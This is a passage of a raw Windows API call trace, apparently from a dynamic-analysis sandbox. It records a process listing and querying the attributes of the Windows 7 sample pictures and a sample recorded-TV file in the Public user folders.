GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Recorded TV\\Sample Media\\win7_scenic-demoshort_raw.wtv", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Recorded TV\\Sample Media\\win7_scenic-demoshort_raw.wtv", lpFilePart=0x0) returned 0x46 [0246.677] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Recorded TV\\Sample Media\\win7_scenic-demoshort_raw.wtv", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Recorded TV\\Sample Media\\win7_scenic-demoshort_raw.wtv", lpFilePart=0x0) returned 0x46 [0246.677] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Recorded TV\\Sample Media\\win7_scenic-demoshort_raw.wtv", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Recorded TV\\Sample Media\\win7_scenic-demoshort_raw.wtv", lpFilePart=0x0) returned 0x46 [0246.677] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Recorded TV\\Sample Media\\win7_scenic-demoshort_raw.wtv", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Recorded TV\\Sample Media\\win7_scenic-demoshort_raw.wtv", lpFilePart=0x0) returned 0x46 [0246.677] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Recorded TV\\Sample Media\\win7_scenic-demoshort_raw.wtv", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Recorded TV\\Sample Media\\win7_scenic-demoshort_raw.wtv", lpFilePart=0x0) returned 0x46 [0246.677] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Recorded TV\\Sample Media\\win7_scenic-demoshort_raw.wtv", nBufferLength=0x105, lpBuffer=0x26de64, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Recorded TV\\Sample Media\\win7_scenic-demoshort_raw.wtv", lpFilePart=0x0) returned 0x46 [0246.677] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26e2c4) returned 1 [0246.677] GetFileAttributesExW (in: lpFileName="C:\\Users\\Public\\Recorded TV\\Sample Media\\win7_scenic-demoshort_raw.wtv" (normalized: "c:\\users\\public\\recorded tv\\sample media\\win7_scenic-demoshort_raw.wtv"), fInfoLevelId=0x0, lpFileInformation=0x26e340 | out: lpFileInformation=0x26e340*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x917fa2ee, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0x8a1f1b86, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x8a1f1b86, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x940000)) returned 1 [0246.678] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e2c0) returned 1 [0246.678] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26e310) returned 1 [0246.678] GetFileAttributesExW (in: lpFileName="C:\\Users\\Public\\Recorded TV\\Sample Media\\win7_scenic-demoshort_raw.wtv" (normalized: "c:\\users\\public\\recorded tv\\sample media\\win7_scenic-demoshort_raw.wtv"), fInfoLevelId=0x0, lpFileInformation=0x744cf34 | out: lpFileInformation=0x744cf34*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x917fa2ee, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0x8a1f1b86, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x8a1f1b86, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x940000)) returned 1 [0246.678] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e30c) returned 1 [0246.678] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Recorded TV\\Sample Media\\win7_scenic-demoshort_raw.wtv", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Recorded TV\\Sample Media\\win7_scenic-demoshort_raw.wtv", lpFilePart=0x0) returned 0x46 [0246.678] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Recorded TV\\Sample Media\\win7_scenic-demoshort_raw.wtv", nBufferLength=0x105, lpBuffer=0x26de64, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Recorded TV\\Sample Media\\win7_scenic-demoshort_raw.wtv", lpFilePart=0x0) returned 0x46 [0246.678] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26e2c4) returned 1 [0246.678] GetFileAttributesExW (in: lpFileName="C:\\Users\\Public\\Recorded TV\\Sample Media\\win7_scenic-demoshort_raw.wtv" (normalized: "c:\\users\\public\\recorded tv\\sample media\\win7_scenic-demoshort_raw.wtv"), fInfoLevelId=0x0, lpFileInformation=0x26e340 | out: lpFileInformation=0x26e340*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x917fa2ee, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0x8a1f1b86, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x8a1f1b86, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x940000)) returned 1 [0246.678] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e2c0) returned 1 [0246.678] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Recorded TV\\Sample Media\\win7_scenic-demoshort_raw.wtv", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Recorded TV\\Sample Media\\win7_scenic-demoshort_raw.wtv", lpFilePart=0x0) returned 0x46 [0246.678] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26e338) returned 1 [0246.678] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Pictures", nBufferLength=0x105, lpBuffer=0x26de40, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Pictures", lpFilePart=0x0) returned 0x18 [0246.678] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Pictures\\", nBufferLength=0x105, lpBuffer=0x26de14, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Pictures\\", lpFilePart=0x0) returned 0x19 [0246.679] FindFirstFileW (in: lpFileName="C:\\Users\\Public\\Pictures\\*", lpFindFileData=0x26e060 | out: lpFindFileData=0x26e060*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x282dfaee, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x288ad099, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6d28e8 [0246.679] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x282dfaee, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x288ad099, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0246.679] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x282dfaee, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x282dfaee, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x288ad099, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x17c, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0246.679] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x80340916, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x288d31f9, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Sample Pictures", cAlternateFileName="SAMPLE~1")) returned 1 [0246.679] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0246.679] FindClose (in: hFindFile=0x6d28e8 | out: hFindFile=0x6d28e8) returned 1 [0246.679] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e2f8) returned 1 [0246.679] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e304) returned 1 [0246.679] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26e338) returned 1 [0246.679] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Pictures", nBufferLength=0x105, lpBuffer=0x26de40, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Pictures", lpFilePart=0x0) returned 0x18 [0246.679] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Pictures\\", nBufferLength=0x105, lpBuffer=0x26de14, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Pictures\\", lpFilePart=0x0) returned 0x19 [0246.679] FindFirstFileW (in: lpFileName="C:\\Users\\Public\\Pictures\\*", lpFindFileData=0x26e060 | out: lpFindFileData=0x26e060*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x282dfaee, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x288ad099, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6d28e8 [0246.679] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x282dfaee, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x288ad099, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0246.680] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x282dfaee, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x282dfaee, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x288ad099, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x17c, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0246.680] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x80340916, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x288d31f9, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Sample Pictures", cAlternateFileName="SAMPLE~1")) returned 1 [0246.680] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x80340916, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x288d31f9, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Sample Pictures", cAlternateFileName="SAMPLE~1")) returned 0 [0246.680] FindClose (in: hFindFile=0x6d28e8 | out: hFindFile=0x6d28e8) returned 1 [0246.680] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e2f8) returned 1 [0246.680] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e304) returned 1 [0246.680] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Pictures\\desktop.ini", nBufferLength=0x105, lpBuffer=0x26de64, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Pictures\\desktop.ini", lpFilePart=0x0) returned 0x24 [0246.680] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Pictures\\desktop.ini", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Pictures\\desktop.ini", lpFilePart=0x0) returned 0x24 [0246.680] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Pictures\\desktop.ini", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Pictures\\desktop.ini", lpFilePart=0x0) returned 0x24 [0246.680] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26e338) returned 1 [0246.680] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures", nBufferLength=0x105, lpBuffer=0x26de40, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Pictures\\Sample Pictures", lpFilePart=0x0) returned 0x28 [0246.680] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\", nBufferLength=0x105, lpBuffer=0x26de14, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Pictures\\Sample Pictures\\", lpFilePart=0x0) returned 0x29 [0246.681] FindFirstFileW (in: lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\*", lpFindFileData=0x26e060 | out: lpFindFileData=0x26e060*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x80340916, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x288d31f9, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6d28e8 [0246.686] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x80340916, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x288d31f9, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0246.686] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80340916, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7beaaeb8, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x7beaaeb8, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0xd6b22, dwReserved0=0x0, dwReserved1=0x0, cFileName="Chrysanthemum.jpg", cAlternateFileName="CHRYSA~1.JPG")) returned 1 [0246.686] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8031a7b6, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7be84d57, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x7be84d57, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0xce875, dwReserved0=0x0, dwReserved1=0x0, cFileName="Desert.jpg", cAlternateFileName="")) returned 1 [0246.686] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x80340916, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7beaaeb8, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x288d31f9, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x460, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0246.686] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8031a7b6, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7be84d57, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x7be84d57, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x91554, dwReserved0=0x0, dwReserved1=0x0, cFileName="Hydrangeas.jpg", cAlternateFileName="HYDRAN~1.JPG")) returned 1 [0246.686] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8031a7b6, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7beaaeb8, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x7beaaeb8, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0xbd616, dwReserved0=0x0, dwReserved1=0x0, cFileName="Jellyfish.jpg", cAlternateFileName="JELLYF~1.JPG")) returned 1 [0246.686] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8031a7b6, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7be84d57, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x7be84d57, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0xbea1f, dwReserved0=0x0, dwReserved1=0x0, cFileName="Koala.jpg", cAlternateFileName="")) returned 1 [0246.686] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80340916, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7beaaeb8, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x7beaaeb8, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x8907c, dwReserved0=0x0, dwReserved1=0x0, cFileName="Lighthouse.jpg", cAlternateFileName="LIGHTH~1.JPG")) returned 1 [0246.686] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8031a7b6, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7be84d57, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x7beaaeb8, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0xbde6b, dwReserved0=0x0, dwReserved1=0x0, cFileName="Penguins.jpg", cAlternateFileName="")) returned 1 [0246.686] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80340916, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7beaaeb8, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x7beaaeb8, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x97958, dwReserved0=0x0, dwReserved1=0x0, cFileName="Tulips.jpg", cAlternateFileName="")) returned 1 [0246.686] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80340916, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7beaaeb8, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x7beaaeb8, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x97958, dwReserved0=0x0, dwReserved1=0x0, cFileName="Tulips.jpg", cAlternateFileName="")) returned 0 [0246.687] FindClose (in: hFindFile=0x6d28e8 | out: hFindFile=0x6d28e8) returned 1 [0246.687] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e2f8) returned 1 [0246.687] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e304) returned 1 [0246.687] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26e338) returned 1 [0246.687] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures", nBufferLength=0x105, lpBuffer=0x26de40, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Pictures\\Sample Pictures", lpFilePart=0x0) returned 0x28 [0246.687] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\", nBufferLength=0x105, lpBuffer=0x26de14, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Pictures\\Sample Pictures\\", lpFilePart=0x0) returned 0x29 [0246.688] FindFirstFileW (in: lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\*", lpFindFileData=0x26e060 | out: lpFindFileData=0x26e060*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x80340916, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x288d31f9, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6d28e8 [0246.688] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x80340916, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x288d31f9, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0246.688] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80340916, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7beaaeb8, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x7beaaeb8, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0xd6b22, dwReserved0=0x0, dwReserved1=0x0, cFileName="Chrysanthemum.jpg", cAlternateFileName="CHRYSA~1.JPG")) returned 1 [0246.688] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8031a7b6, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7be84d57, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x7be84d57, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0xce875, dwReserved0=0x0, dwReserved1=0x0, cFileName="Desert.jpg", cAlternateFileName="")) returned 1 [0246.689] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x80340916, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7beaaeb8, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x288d31f9, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x460, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0246.689] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8031a7b6, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7be84d57, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x7be84d57, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x91554, dwReserved0=0x0, dwReserved1=0x0, cFileName="Hydrangeas.jpg", cAlternateFileName="HYDRAN~1.JPG")) returned 1 [0246.689] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8031a7b6, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7beaaeb8, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x7beaaeb8, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0xbd616, dwReserved0=0x0, dwReserved1=0x0, cFileName="Jellyfish.jpg", cAlternateFileName="JELLYF~1.JPG")) returned 1 [0246.689] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8031a7b6, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7be84d57, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x7be84d57, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0xbea1f, dwReserved0=0x0, dwReserved1=0x0, cFileName="Koala.jpg", cAlternateFileName="")) returned 1 [0246.689] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80340916, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7beaaeb8, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x7beaaeb8, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x8907c, dwReserved0=0x0, dwReserved1=0x0, cFileName="Lighthouse.jpg", cAlternateFileName="LIGHTH~1.JPG")) returned 1 [0246.689] FindNextFileW (in: 